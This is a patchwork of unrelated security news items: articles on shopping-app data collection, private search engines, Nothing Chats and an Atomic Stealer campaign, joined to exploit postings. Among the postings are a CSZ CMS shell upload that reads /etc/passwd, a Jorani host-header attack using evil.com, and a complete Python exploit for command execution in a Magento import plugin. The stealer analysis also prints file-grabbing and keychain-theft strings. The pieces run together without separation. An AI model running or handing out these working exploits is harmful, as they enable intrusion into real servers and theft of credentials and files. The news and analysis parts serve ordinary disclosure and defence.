By Deeba Ahmed
Amazon and eBay have been declared the highest data-collecting platforms among all the Android shopping apps researchers examined.
This is a post from HackRead.com Read the original post: Study Finds Amazon, eBay and Afterpay as Top Android User Data Collectors

As per Atlas VPN’s research, besides Amazon, eBay, and Afterpay, other popular apps were also found to be sharing personal details and financial data with third parties.

To shop for Black Friday and Cyber Monday, most users turn to smartphones and tablets to secure the best deals. However, it is essential to be aware of potential risks, such as how various vendors collect your data, to navigate the shopping season safely.

According to the latest research conducted by the Atlas VPN team, numerous leading online shopping platforms collect sensitive user data, with some going as far as sharing this **information with third parties** without the users’ knowledge.

The platforms underwent assessment across various data collection categories, encompassing personal details, financial information, and user geolocation. The evaluated data points included the user’s name, phone number, payment method, and precise location, which were further categorized into extended data types for more in-depth analysis.

In addition, Atlas VPN researchers assessed the Google Play app profiles of the 60 most popular Android apps within the shopping category. The apps were ranked according to the number of user information data points collected.

The researchers chose apps from App Figures’ top Android shopping app charts for 2023 for their analysis. The charts comprised various apps, including shopping, buy now and pay later, and discount offer apps. Researchers have shared their list of the year’s top 15 highest-user data-collecting apps.

According to their **report**, Amazon and eBay have been declared the highest data-collecting platforms among all the Android shopping apps researchers examined. Reportedly, eBay collects 28 user data points, and Amazon collects 25.

The popular buy-now app Afterpay was the third-highest data collecting platform with 22 data points against 7 data types. It was the only identified app that didn’t just collect data but also shared sensitive data such as in-app messages, emails, SMS messages, and credit scores with third parties.

Next were Home Improvement retailer Lowe’s health retail platform iHerb and Vinted, a secondhand products marketplace. Each collected 21 data points. Chinese e-comm website Alibaba and home goods giant Home Depot collected 20 data points across 9 data types. Poshmark, another secondhand goods retailer, collected significant user data with 19 data points in 7 categories.

The rest of the apps included Nike, Wayfair, OfferUp, Craigslist, ASOS, and H&M apps, each collecting 18 data points. Among the 60 apps examined by Atlas VPN, Kohl’s app didn’t collect any data. A staggering 75% of the apps share user data with third parties. For instance, 52% and 38% of apps shared app activity, app info, and performance data, typically used to enhance user experience. 

Moreover, 58% of the apps shared personal data like names, home addresses, email IDs, and phone numbers with third parties. A whopping 25% of these apps shared device IDs or other unique identifiers for smartphones and tablets.

Around one-third, or 37%, of the apps disclosed financial data, including purchase history and payment details, whereas 28% shared location data with external sources. The extent of data sharing among Android shopping apps is alarming and a threat to user privacy.

Cybersecurity writer at Atlas VPN, Vilius Kardelis, shared his thoughts on shopping app data collection with Hackread.com, stating that:

“In today’s digital age, your personal information is being extensively collected by apps and shared with countless firms. This holiday season, approach all apps aware your data is being collected. Take the time to carefully read privacy policies, be mindful of the permissions you grant, and prioritize safe shopping practices to safeguard your personal information.”

****Surprised? Don’t be!****

Smartphone apps are designed to collect user data, and the extent and duration of this collection are subjects of debate. Contrarily, data collection and sharing constitute a lucrative business for technology giants.

**In 2021,** researchers claimed that Android sends more data to Google than iOS does to Apple. The research suggested that Android devices collect and transmit twice as much data to Google compared to iOS to Apple. However, Google refuted these findings.

In August of last year, researchers compiled a list of the 10 Android Educational Apps that collect the most user data. The list, **available here**, includes some of the most prominent and widely used Android apps globally.

****Conclusion:****

There isn’t much one can do to prevent apps from collecting data. However, if you are an Android user, consider downloading apps only after reviewing the section on the Play Store that details the data the app collects.

1.  **Fake GitHub Repos Delivering Malware as PoCs**
2.  **Google kicks out 600 malicious apps from Play Store**
3.  **Apple removed all major VPN apps from Chinese App Store**
4.  **Google removes ClearURLs Chrome extension from its store**
5.  **Google Fails To Remove “App Developer” Behind Malware Scam**

Study Finds Amazon, eBay and Afterpay as Top Android User Data Collectors

What you look for online is up to you—just make sure no one else is taking a peek.

When it comes to looking something up on the web, most of us default to “googling” it—Google's search engine has become so dominant that it's now a verb, in the same way that Photoshop is. But using Google for your searches comes with a privacy trade-off.

Google's business is, of course, based on advertising, and every search you make feeds into the profile of you that it uses to target the ads you see around the web. While Google isn't telling marketing firms what searches you're running, it is using those queries to build up a picture of you that ads can be sold against. As such, Google can be a real snoop about collecting all your data and using it to personalize your ads and the search results you get.

There are ways to increase your privacy on Google’s platforms, like using privacy-focused browsers, using privacy-focused alternatives to Google Maps, auto-deleting your web history after a certain time period, or simply limiting the amount of data the company collects in the first place, by opting out of features like web-based email and location awareness. (And you should know that using your browser's incognito mode isn’t as sneaky as you think it is.) If you're serious about getting off the data collection grid, there’s a bevy of other privacy-focused search options at your disposal. So if you want to use a search engine that doesn't keep track of your queries, serve your data to advertisers, or change your search results based on what it thinks you’ll like, you’ve got some options.

DuckDuckGo

DuckDuckGo is simple, secure, and private.

DuckDuckGo via David Nield

The granddaddy of Google alternatives, DuckDuckGo has made private search its raison d'être for more than 15 years. The service is a little harder to recommend these days, after a kerfuffle in 2022 where the company was caught in an apparent partnership with Microsoft that allowed the tech behemoth’s tracking scripts to run unimpeded on the DuckDuckGo browser. After outcry from privacy advocates, DuckDuckGo walked back that stance a few months later, and it now says it does indeed block Microsoft’s trackers.

If you can move past that particular ugly duckling, the service is still far more private than Google. DuckDuckGo says it collates information in search results from over 400 sources. It doesn’t draw from Google, but it does pull from places like Bing and Wikipedia. What it doesn’t do is personalize search results based on data it collects from users. Like Google, DuckDuckGo displays ads, but they’re not tailored to what it thinks you’ll like based on your search history.

DuckDuckGo can be installed into just about any browser via a browser extension. It also has a full browser available on desktop for Mac and Windows. There are also mobile apps on both iOS and Android that work as browsers while incorporating DuckDuckGo’s search engine.

On the browser and app alike, the service automatically tracks and blocks all the data-scraping efforts from the websites you visit. Press the shield button in the browser bar to see what sites have tried to collect your data or track your travels across the web. Another feature blocks trackers and data requests in other apps on your phone. DuckDuckGo says it can’t block certain scripts and trackers on the websites that run them (like Facebook, for example), but tapping that little button quickly lets you know what’s being blocked and what’s not.

Brave Search

Brave isn't going to keep track of what you're looking for.

Brave via David Nield

The privacy-focused browser extension provider Brave has its own dedicated search engine. The company launched the service in 2021. Like the other services on this list, Brave says its Search product doesn’t track your searches or log your data. It's impressively comprehensive—as much for its security and privacy as for the results you get.

Simply put, no logs of your queries are kept by the search engine. While that might make for a slightly less convenient user experience—Google might automatically know you're more interested in the Miami Dolphins than actual dolphins, for instance—it does mean that you can search without worrying that you're going to see any related advertising.

"It's impossible for us to share, sell, or lose your data, because we don’t collect it in the first place," says Brave. While the service might eventually become ad-supported, those adverts won't know anything about you or what you've been looking for on the web, making it distinctly different from Google's offering.

Brave also has a service in beta called Goggles that lets users customize their own page rankings to make search results more relevant to each person. It can have some issues, such as being a bit complicated and also could lead to people creating their own little filter bubbles—inadvertently or otherwise.

You can download the Brave Browser for desktop, or get its mobile apps on Android and iOS. You can also access the Brave search engine from any web browser and any device. You don't have to use the Brave browser to use it.

Kagi

The prospect of paying for a search engine might seem odd if you’re used to unlimited Googling on a whim. But that’s exactly the service Kagi is offering.

If you’re willing to pay for yet another subscription, Kagi is a premium search experience worth trying. You can customize how search results are displayed and how links are organized and accessed. There’s also a robust array of search operators and keyboard shortcuts to use. Kagi’s privacy policy is similar to the other services on this list, in that it doesn’t track your online movements or collect your data. It also doesn’t show ads, which feels like such a relief in the era of endless pop ups and sponsored posts.

The pricing plan is simple. There is a free tier, which allots you 100 searches per month before cutting you off. From there you can pay $5 per month for 500 searches, or get unlimited searches $10 a month. All plans, even the free ones, require you to make an account.

Kagi is available as a browser extension for Firefox, Google Chrome, and Safari. Kagi’s Orion browser is available on the Mac, and it also has an iOS app.

Startpage

Want Google’s search results but without Google? Startpage may be the answer. The company serves up Google’s search results without you being tracked. “Startpage submits your query to Google anonymously, then returns Google results to you privately,” the company says on its website. It adds that Google “never sees you and does not know who made the request”.

Startpage, which was founded in the Netherlands in 2006, says that it doesn’t store people’s personal data or search history, and your IP address is removed by its servers. The company also says it blocks price trackers and prevents advertisers from showing you ads based on your online history. (It does show ads from Google’s search results). Its search results also let you click to open an anonymous view of them, which it claims works like a VPN.

The experience isn’t exactly the same as Google search, but the results are. For instance, if you search for something in the news—maybe Elon Musk, if you must—Google will show you a carousel of the latest news stories before its search results. Google also includes Musk’s latest tweets, videos of him, and photos. When you’re using Startpage, the clutter is removed and you just get URLs.

Mojeek

Mojeek doesn’t use search results from other search engines. Instead, the British search engine, which launched in 2006, is building its own index of the web. It’s doing this in the same way as Google and Bing. The company’s crawlers, which trawl the web and collect information about pages, have indexed more than six billion web pages.

This crawling isn’t as extensive as Google’s—back in 2013 Google said it was indexing 30 trillion web pages, 100 billion times a month—but Mojeek says its approach means it is fully in control of the search results it shows. The company argues there should be alternative indexes to those controlled by Big Tech. “Making and altering our own algorithm from scratch to display high quality and unbiased results is essential,” the company said in 2018.

But that’s not the only difference to Google. Mojeek also says it doesn’t track people. The search results you see are based entirely on the words that you type in, the company says, and it doesn’t collect IP addresses, search history or the clicks that you make.

Limiting Google

You can break the connection between Google Chrome and your Google account.

Google via David Nield

It's worth bearing in mind that if you're using Google Chrome and you're signed into Google, you may well be syncing your DuckDuckGo or Brave searches back to your Google account. Your Google web history and your Chrome browsing history (if you're signed into Google) will match up most of the time, because Google keeps them in sync by default, partly to make it easier to use Google across multiple devices.

To stop this from happening in Chrome, click the three dots in the top right-hand corner, then choose **Settings**. If you see that you're signed into your Google account at the very top, click **Turn off**—this will break the connection between Google and your browser, and you'll be given the option to delete all the data that's stored locally on your device (including your browsing history, bookmarks, and stored passwords).

Perhaps an easier option is to simply switch to another browser altogether—as we've already mentioned, Brave, DuckDuckGo, and Kagi all have them. Other good cross-platform alternatives to Chrome are Microsoft Edge, Mozilla Firefox, Opera and Safari from Apple—but whichever one you switch to, be sure to check out the settings for deleting your browsing history as you go. (All of these browsers have simple-to-use options for this.)

Whichever browser you decide to use, opening up a private or incognito window while you're searching will prevent those searches from being logged inside the browser—as soon as you close the window, the search is gone forever. Bear in mind that these modes don't necessarily stop online companies from tracking your queries though. (If you sign into your Google account while in private mode, Google will still be able to track you.)

If you can't bring yourself to be parted from the search results that Google serves up, you can at least make sure that they're not remembered for too long. Open up your Google account settings page on the web, then click **Data & Privacy** and scroll down to **Web & App Activity.** You can choose either **Manage activity** to remove history and searches manually, or select the **Auto-delete** option to have this data wiped automatically once it's been stored for a certain amount of time.

Private and Secure Web Search Engines: DuckDuckGo, Brave, Kagi, Startpage

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

**CSZ CMS 1.3.0 Shell Upload**

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

**CSZ CMS 1.3.0 Shell Upload**

    # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

**File Tags**

*   ActiveX (932)
*   Advisory (83,267)
*   Arbitrary (16,401)
*   BBS (2,859)
*   Bypass (1,803)
*   CGI (1,029)
*   Code Execution (7,417)
*   Conference (682)
*   Cracker (843)
*   CSRF (3,353)
*   DoS (23,990)
*   Encryption (2,372)
*   Exploit (52,241)
*   File Inclusion (4,233)
*   File Upload (977)
*   Firewall (822)
*   Info Disclosure (2,807)
*   Intrusion Detection (900)
*   Java (3,091)
*   JavaScript (879)
*   Kernel (6,834)
*   Local (14,569)
*   Magazine (586)
*   Overflow (12,849)
*   Perl (1,426)
*   PHP (5,162)
*   Proof of Concept (2,349)
*   Protocol (3,652)
*   Python (1,566)
*   Remote (31,026)
*   Root (3,605)
*   Rootkit (515)
*   Ruby (614)
*   Scanner (1,645)
*   Security Tool (7,926)
*   Shell (3,209)
*   Shellcode (1,216)
*   Sniffer (897)
*   Spoof (2,229)
*   SQL Injection (16,436)
*   TCP (2,419)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,079)
*   Web (9,786)
*   Whitepaper (3,757)
*   x86 (966)
*   XSS (18,042)
*   Other

**File Archives**

*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   Older

**Systems**

*   AIX (429)
*   Apple (2,037)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,907)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,375)
*   HPUX (880)
*   iOS (363)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (47,744)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (14,557)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,110)
*   UNIX (9,338)
*   UnixWare (187)
*   Windows (6,605)
*   Other

CSZ CMS 1.3.0 Shell Upload

Nothing's new message app Chats has been pulled from Google Play after harsh criticism about security issues.

Sometimes it’s all in the name. The Nothing Chats beta has been pulled from the Google Play Store after reports that the company behind it has access to your (unencrypted) messages.

Nothing Phone 2 owners were promised a first-of-its-kind app developed in partnership with Sunbird, which allowed them to message other iMessage users via blue bubbles on their Nothing Phone.

And, as promised, the beta version was made available for download in the Play Store on Friday November 17, 2023. But today the Nothing Chats page says:

> We’ve removed the Nothing Chats beta from the Play store and will be delaying the launch until further notice to work with Sunbird to fix several bugs. We apologize for the delay and will do right by our users.

Now, it’s pretty normal for beta releases to have some bugs that need ironing out. That’s what they are in beta for. But these weren’t some mildly annoying bugs.

Basically, Nothing Chats is just a reskinned version of the existing Sunbird application, which is currently available on the Google Play Store. In essence the Nothing Chats app routes your messages through a macOS virtual machine that sends them on as iMessages. But to do this the Nothing Chats application is required to send your Apple ID credentials to its servers, so it can authenticate on your behalf.

According to Nothing, Sunbird’s architecture provides a system to deliver a message from one user to another without ever storing it at any point in its journey. But only one day after the release of the beta, Texts.com published a blog titled Sunbird / ‘Nothing Chats’ is Not Secure.

Members of the Texts.com reverse engineering team took it upon themselves to take a look into the Sunbird application and its security practices, and found a few vulnerabilities and implementation issues.

> texts team took a quick look at the tech behind nothing chats and found out it's extremely insecure
> 
> it's not even using HTTPS, credentials are sent over plaintext HTTP
> 
> backend is running an instance of BlueBubbles, which doesn't support end-to-end encryption yet pic.twitter.com/IcWyIbKE86
> 
> — Kishan Bagaria (@KishanBagaria) November 17, 2023

While Sunbird tries to implement end-to-end-encryption (E2EE), its implementation is overshadowed by decrypting, and then storing the unencrypted payloads in its database.

The apps route all data relating to a message sent by Sunbird, and Nothing Chat, including the contact information, message contents, and attachment URLs to the Sunbird’s Sentry. This Sentry acts as a debugging platform, which allows access to the data in plaintext by authorized parties within the company.

Which is not what Nothing promised:

> All Chats messages are end-to-end encrypted, meaning neither we nor Sunbird can access the messages you’re sending and receiving.

Other investigators found that Nothing Chats sends all media attachments, including user images, to Sentry with links to those attachments visible in plain text.

> Thread time!
> 
> Summary:  
> – Sunbird has access to every message sent and received through the app on your device.
> 
> – All of the documents (images, videos, audios, pdfs, vCards…) sent through Nothing Chat AND Sunbird are public.
> 
> – Nothing Chats is not end-to-end encrypted.
> 
> — Dylan Roussel (@evowizz) November 18, 2023

Nothing Chats sends all media attachments, including user images, to Sentry with links to those attachments visible in plain text. Further, researchers found all data was sent and stored through Firebase. They found over 630,000 media files currently stored by Sunbird via Firebase including images, videos, PDFs, audio, and more. So, while it may be true that Sunbird doesn’t store user data on its own servers, the data does get stored.

This isn’t a major problem for everyone, but the authentication is. By sending our Apple ID to a third-party service, we are not only trusting the third-party with our texts, but should they become compromised, our photos, videos, contacts, notes, keychain, and more are at risk.

Users worried about a spill of sensitive data should read our guide: Involved in a data breach? Here’s what you need to know.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Nothing Chats pulled from Google Play 

Browser push notifications are becoming a problem on macOS. Learn how to remove them.

Scammers are abusing an Apple feature that allows websites to create push notifications that look like they’re coming from macOS, or apps. The notifications try to scare users into clicking a link with fake virus alerts or messages saying their account has been hacked.

Years ago we warned our readers about the introduction of browser push notifications because we felt they were a feature waiting to be abused. At the time we focused on Windows users, but recently we are seeing examples of macOS users being plagued by this pest.

As Apple proudly announced:

> Use the Apple Push Notifications Service to send notifications to your website users, right on their Mac desktop — even when Safari isn’t running. Safari Push Notifications work just like push notifications for apps. They display your website icon and notification text, which users can click to go right to your website.

Do you see the problems?

*   “Even when Safari isn’t running.” So how are users supposed to know where the notifications are coming from?
*   “Work just like push notifications for apps.” My point exactly. How can we distinguish them from actual system notifications?
*   “They display your website icon.” Website icons are controlled by the website owner, so they can used the system settings icon for their website, making their notifications look like system notifications.

The Websites section in Safari settings shows a website that uses the macOS System Settings icon

These settings can appear in Safari Settings or System Settings, and you can remove them by following the instructions below.

**Application Notifications**

Open your Apple **System Settings** and then select the **Notifications** tab along the left.

Scroll down the list under **Application Notifications** and look for any websites that have permission to send you notifications. The entry may have a name designed to mislead you, such as “ask you” or “Notifications”.

Under each item you will be able to see what type of notification permissions it has. To stop these, just click on the entry and turn off the slider at the top which will disable notifications for this item.

A website listed under Application Notifications with a misleading name and icon

**Safari Settings**

In the Safari app on your Mac, choose **Safari** and click **Settings**. Click **Websites**, then click **Notifications**.

Scroll through the list of websites and look for websites that don’t want to receive notifications from. Anything that shows **Allow** can send you messages, so switch them to **Deny** if you do not want to see their messages.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 How to stop fake System notifications on macOS 

Compromised websites are being used to redirect to fake browser updates and deliver malware onto Mac users.

Atomic Stealer, also known as AMOS, is a popular stealer for Mac OS. Back in September, we described how malicious ads were tricking victims into downloading this piece of malware under the disguise of a popular application.

In an interesting new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating system.

With a growing list of compromised sites at their disposal, the threat actors are able to reach out a wider audience, stealing credentials and files of interest that can be monetized immediately or repurposed for additional attacks.

**Discovery**

ClearFake is a newer malware campaign that leverages compromised websites to distribute fake browser updates. It was originally discovered by Randy McEoin in August and has since gone through a number of upgrades, including the use of smart contracts to build its redirect mechanism, making it one of the most prevalent and dangerous social engineering schemes.

On November 17, security researcher Ankit Anubhav observed that ClearFake was distributed to Mac users as well with a corresponding payload:

The Safari template mimics the official Apple website and is available in different languages:

Since Google Chrome is also popular on Macs, there is a template for it which closely resembles the one used for Windows users:

**Atomic Stealer**

The payload is made for for Mac users, a DMG file purporting to be a Safari or Chrome update. Victims are instructed on how to open the file which immediately runs commands after prompting for the administrative password.

Looking at the strings from the malicious application, we can see those commands which include password and file grabbing capabilities:

find-generic-password -ga 'Chrome' | awk '{print $2}' SecKeychainSearchCopyNext:
/Chromium/Chrome /Chromium/Chrome/Local State FileGrabber tell application "Finder"
set desktopFolder to path to desktop folder
set documentsFolder to path to documents folder
set srcFiles to every file of desktopFolder whose name extension is in {"txt", "rtf", "doc", "docx", "xls", "key", "wallet", "jpg", "png", "web3", "dat"}
set docsFiles to every file of documentsFolder whose name extension is in {"txt", "rtf", "doc", "docx", "xls", "key", "wallet", "jpg", "png", "web3", "dat"}

In the same file, we can find the malware’s command and control server where the stolen data is sent to:

**Macs need protection too**

Fake browser updates have been a common theme for Windows users for years, and yet up until now the threat actors didn’t expand onto MacOS in a consistent way. The popularity of stealers such as AMOS makes it quite easy to adapt the payload to different victims, with minor adjustments.

Because ClearFake has become one of the main social engineering campaigns recently, Mac users should pay particular attention to it. We recommend leveraging web protection tools to block the malicious infrastructure associated with this threat actor.

Malwarebytes users are protected against Atomic Stealer:

**Indicators of Compromise**

Malicious domains

longlakeweb\[.\]com
chalomannoakhali\[.\]com
jaminzaidad\[.\]com
royaltrustrbc\[.\]com

AMOS stealer

4cb531bd83a1ebf4061c98f799cdc2922059aff1a49939d427054a556e89f464  
be634e786d5d01b91f46efd63e8d71f79b423bfb2d23459e5060a9532b4dcc7b

AMOS C2

194.169.175\[.\]117

 Atomic Stealer distributed to Mac users via fake browser updates 

Jorani Leave Management System version 1.0.2 suffers from a host header injection vulnerability.

    # Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://jorani.org/# Software Link:https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip# Version: v1.0.2# Tested on: Windows 10, PHP version: 8.2.4, Apache/2.4.56# CVE: CVE-2023-48205Descriptions:A Host Header Injection vulnerability in Jorani Leave Management System1.0.2 may allow an attacker to spoof a particular header. This can beexploited by abusing password reset emails.Steps to Reproduce:1. Request:GET /jorani/session/login HTTP/1.1Host: 192.168.1.74Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/119.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;jorani_session=pqop598dtj85okrjvh043es6pqp1juagConnection: close2. Now change host name and check browser response. So your request datawill be:GET /jorani/session/login HTTP/1.1Host: evil.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/119.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;jorani_session=pqop598dtj85okrjvh043es6pqp1juagConnection: close## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48205)

Jorani Leave Management System 1.0.2 Host Header Injection

FireBear Improved Import and Export version 3.8.6 for Magento 2.4.6 suffers from an XSLT server-side injection vulnerability that allows for command execution.

    Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6  - XSLT Server Side Injection Command Execution# Date: 2023-11-17# Exploit Author: tmrswrr# Vendor Homepage: https://commercemarketplace.adobe.com/# Software Link:  https://commercemarketplace.adobe.com/firebear-importexport.html# Version: FireBear ver. 3.8.6# Tested on: Magento 2.4.6Poc:https://github.com/capture0x/Magento-ver.-2.4.6/Exploit:import requestsfrom bs4 import BeautifulSoupimport reimport json import sysif len(sys.argv) != 3:    print("Usage: python exploit.py <base_url> <command>")    sys.exit(1)base_url = sys.argv[1]command = sys.argv[2]base_url = base_url.rstrip('/') + '/'login_page_url = base_url + "admin/"login_action_url = base_url + "admin/"import_job_edit_url = base_url + "import/job/edit/entity_id/21/" session = requests.Session() response = session.get(login_page_url)soup = BeautifulSoup(response.text, 'html.parser')form_key = soup.find('input', {'name': 'form_key'})['value']login_payload = {    'form_key': form_key,    'login[username]': 'demo',    'login[password]': '1q2w3e4r5t'} headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'} login_response = session.post(login_action_url, headers=headers, data=login_payload) if login_response.ok and login_response.history:    print("Login successful!")    redirected_url = login_response.url    print("Redirected URL:", redirected_url)         import_job_edit_response = session.get(import_job_edit_url)    soup = BeautifulSoup(import_job_edit_response.text, 'html.parser')    second_form_key = soup.find('input', {'name': 'form_key'})['value']    print("Extracted Key")        key = re.findall(r'key\/(.*?)\/', login_response.url)[0]         second_post_url = f"{base_url}import/job/xslt/key/{key}/?isAjax=true"            second_post_payload = f"form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=xslt%2B%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0A%3Cxsl%3Astylesheet+version%3D%221.0%22%0Axmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0Axmlns%3Aphp%3D%22http%3A%2F%2Fphp.net%2Fxsl%22%3E%0A%3Cxsl%3Atemplate+match%3D%22%2F%22%3E%0A%3Cxsl%3Avalue-of+select%3D%22php%3Afunction('shell_exec'%2C'{command}')%22+%2F%3E%0A%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=host%2B&form_data%5B%5D=port%2B&form_data%5B%5D=username%2B&form_data%5B%5D=password%2B&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=file_upload%2B&form_data%5B%5D=predefined_structure%2B0&form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=import_images_file_dir%2B&form_data%5B%5D=scan_directory%2B0&form_data%5B%5D=deferred_images%2B0&form_data%5B%5D=delete_file_after_import%2B0&form_data%5B%5D=archive_file_after_import%2B0&form_data%5B%5D=image_import_source%2B0&form_data%5B%5D=remove_current_mappings%2B0&form_data%5B%5D=associate_child_review_to_configurable_parent_product%2B0&form_data%5B%5D=associate_child_review_to_bundle_parent_product%2B0&form_key={second_form_key}"       second_post_headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',        'Referer': import_job_edit_response.url       }         second_post_response = session.post(second_post_url, headers=second_post_headers, data=second_post_payload)         if second_post_response.ok:        print("XSL Imported!")        response_json = json.loads(second_post_response.text)                result_xml = response_json.get("result", "")        if result_xml is not None:                     result_xml = result_xml.replace("<?xml version=\"1.0\"?>", "\n")                else:                      result_xml = "No Output found in the response."                print("Output:", result_xml)            else:        print("Import failed.")        print("Status Code:", second_post_response.status_code)        print("Response:", second_post_response.text)else:    print("Login failed.") session.close()

FireBear Improved Import And Export 3.8.6 XSLT Server Side Injection

In International Color Consortium DemoIccMAX 3e7948b, CIccCLUT::Interp2d in IccTagLut.cpp in libSampleICC.a has an out-of-bounds read.

@maxderhak - Please reconsider this Pull Request given the recent Commit f184f38 does not address these issues in this proposed Patch for CIccCLUT::Interp2d and CIccCLUT::Interp3d.

**CIccCLUT::Interp2d Patch Summary**

*   This proposed CIccCLUT::Interp2d patch improves the safety and correctness of the Interp2d function in Commit f184f38.
*   The Patch for CIccCLUT::Interp2d addresses potential out-of-bounds memory access by implementing robust boundary checks and early exit in case of invalid conditions.
*   The patch for CIccCLUT::Interp2d enhances readability and maintainability by clearly defining index calculations and handling edge cases more effectively.

**Compare & Contrast**

The proposed patch for the CIccCLUT::Interp2d function introduces several modifications aimed at preventing heap overflow and ensuring robust interpolation. Compare and contrast these changes with the original function:

**Original Function**

1.  Boundary Handling:  
    The original function decreases ix and iy by 1 if they equal mx or my, respectively, and sets u or t to 1.0. This approach can potentially lead to incorrect interpolation near the edges.
2.  Index Calculation:  
    The calculation of indices (n000, n001, n010, n011) is implicit and assumes a specific layout of m\_pData without explicit boundary checks.
3.  Error Handling:  
    There is no explicit handling of out-of-bounds conditions except for adjusting ix, iy, u, and t.

